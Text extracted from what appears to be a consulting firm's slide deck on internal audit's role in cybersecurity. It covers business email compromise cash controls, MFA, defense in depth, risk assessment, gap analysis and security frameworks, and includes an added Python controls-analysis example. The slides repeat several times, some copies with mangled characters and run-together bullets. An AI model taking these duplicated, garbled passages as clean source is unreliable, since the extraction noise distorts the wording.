25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
28
BEC & OFFICE 365
• Office 365 is Microsoft’s cloud-based solution offering everything from email and Excel to cloud storage.
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies.
• 20% of all companies use Office 365.
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft.
• Most companies do not correctly set up Office 365 security or logging.
• Significant increase in attack vectors against Office 365.
• It only takes one employee and the hacker is internal to email and Office 365.
• Some attack vectors do not require a phishing email.
29
BEC ATTACK WALKTHROUGH
30
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k – triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email).
• Reports that generate overdue receivables timely for follow-up.
• Elevation rules for overdue receivables.
Cash Disbursement
• SOD – limit access to the vendor master file.
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change.
• Vendor set-up – verification of information provided.
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors.
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used.
• Multi-factor authentication.
Other Processes to Consider: Treasury, Payroll, Royalties, SOX Impact, Cyber Insurance, Legal Liabilities, Contract Language
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes.
• Office 365 and other cloud-based services should all use multi-factor authentication.
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company’s information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company’s first line of defense may fail and integrates multiple layers of defense around a company’s information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
35
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets.
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets.
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls.
Step 4 - Follow-up reviews to monitor control implementation progress.
Repeat.
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
36
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist.
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified.
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event.
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks.
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the company’s information assets.
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
37
38
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business.
Example screenshot of a critical data asset risk assessment
40
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest-priority, most impactful controls that should be implemented first.
41
STEP 3 - CONTROLS ANALYSIS
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment).
• Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap.
[Chart: Mitigating Control Counts]
A) Identify information systems with calculated cybersecurity risk > 100.
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step.
C) Identify mitigating controls to implement to mitigate the threat.
D) Total all instances where controls reduced risk.
42
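Steps A to D of the controls analysis as a runnable Python example (added here; it is not code from the presentation). It assumes a risk score of asset value × threat likelihood, a constructed asset inventory and a constructed threat-to-control mapping that reuses control names from the defense-in-depth and quick-hit slides; it also surfaces any over-threshold threat with no mapped control, which is the gap a control roadmap must not miss.

```python
"""Controls analysis for the Step 1 to Step 3 audit procedure on the slides.

Added example, not part of the original presentation. Assumptions the slides do
not state: risk is scored as asset value (1-20) x threat likelihood (1-10), the
asset inventory is constructed, and the threat-to-control mapping is constructed
from the control names on the defense-in-depth and quick-hit slides.
"""
from collections import Counter
from typing import Dict, List, Tuple

# The slides' cut-off: "calculated cybersecurity risk > 100".
RISK_THRESHOLD = 100

# Constructed sample inventory (Step 1 output): asset classification value and the
# semi-qualitative likelihood of each specific threat against that asset.
ASSETS: Dict[str, dict] = {
    "ERP / vendor master file": {
        "value": 20, "threats": {"BEC": 9, "Ransomware": 7, "Unpatched software": 4}},
    "Payroll system": {
        "value": 15, "threats": {"BEC": 8, "Phishing": 9, "Privileged account misuse": 5}},
    "Marketing web server": {
        "value": 5, "threats": {"Unpatched software": 9, "Ransomware": 5}},
    "Engineering file share": {
        "value": 18, "threats": {"Ransomware": 6, "Privileged account misuse": 8,
                                 "Insider data theft": 7}},
}

# Constructed mapping of threats to the mitigating controls named on the slides.
# "Insider data theft" is deliberately unmapped to show how a control gap surfaces.
MITIGATING_CONTROLS: Dict[str, List[str]] = {
    "BEC": ["Multi-factor authentication", "Vendor bank-change verification",
            "End user training"],
    "Phishing": ["End user training", "Multi-factor authentication"],
    "Ransomware": ["Patch management", "Endpoint protection", "Segregated backups"],
    "Unpatched software": ["Patch management", "Vulnerability scanning"],
    "Privileged account misuse": ["Least privilege review",
                                  "Privileged access monitoring",
                                  "Multi-factor authentication"],
}


def risk_score(value: int, likelihood: int) -> int:
    """Semi-qualitative risk: asset value x threat likelihood (assumed scoring)."""
    return value * likelihood


def systems_over_threshold(assets: Dict[str, dict],
                           threshold: int = RISK_THRESHOLD) -> Dict[str, int]:
    """Step A: systems whose highest single-threat risk exceeds the threshold."""
    result: Dict[str, int] = {}
    for name, info in assets.items():
        worst = max(risk_score(info["value"], lk) for lk in info["threats"].values())
        if worst > threshold:
            result[name] = worst
    return result


def threats_over_threshold(assets: Dict[str, dict],
                           threshold: int = RISK_THRESHOLD) -> List[Tuple[str, str, int]]:
    """Step B: (asset, threat, score) for every specific threat over the threshold."""
    hits: List[Tuple[str, str, int]] = []
    for name, info in assets.items():
        for threat, lk in info["threats"].items():
            score = risk_score(info["value"], lk)
            if score > threshold:
                hits.append((name, threat, score))
    return hits


def mitigating_control_counts(assets: Dict[str, dict],
                              controls: Dict[str, List[str]],
                              threshold: int = RISK_THRESHOLD) -> Counter:
    """Steps C and D: for each over-threshold (asset, threat) pair, look up the
    mitigating controls and count every instance where a control reduces risk."""
    counts: Counter = Counter()
    for _asset, threat, _score in threats_over_threshold(assets, threshold):
        counts.update(controls.get(threat, []))
    return counts


def unmitigated_threats(assets: Dict[str, dict], controls: Dict[str, List[str]],
                        threshold: int = RISK_THRESHOLD) -> List[Tuple[str, str, int]]:
    """Control gap: over-threshold threats with no mapped mitigating control."""
    return [hit for hit in threats_over_threshold(assets, threshold)
            if not controls.get(hit[1])]


def prioritized_controls(counts: Counter) -> List[Tuple[str, int]]:
    """Roadmap input: controls ordered by how many critical risks they reduce."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for asset, score in systems_over_threshold(ASSETS).items():
        print(f"{asset}: calculated risk {score}")
    counts = mitigating_control_counts(ASSETS, MITIGATING_CONTROLS)
    for control, n in prioritized_controls(counts):
        print(f"{n:2d}  {control}")
    for asset, threat, score in unmitigated_threats(ASSETS, MITIGATING_CONTROLS):
        print(f"GAP: {asset} / {threat} ({score}) has no mitigating control mapped")
```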
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization’s cybersecurity position.
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity.
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable’s Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
43
44
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
45
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don’t just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges.
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker’s first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns.
• Evaluate your company’s overall cybersecurity training and awareness program.
46
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process.
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly.
• Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place.
47
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device’s risk relating to patches.
• Understand your company’s fundamental process around Patch Management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all User and Admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
• Understand the coverage and terms of your company’s cyber insurance policy.
• Assess the requirement for Multi-factor Authentication.
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco, Principal
mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates
stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
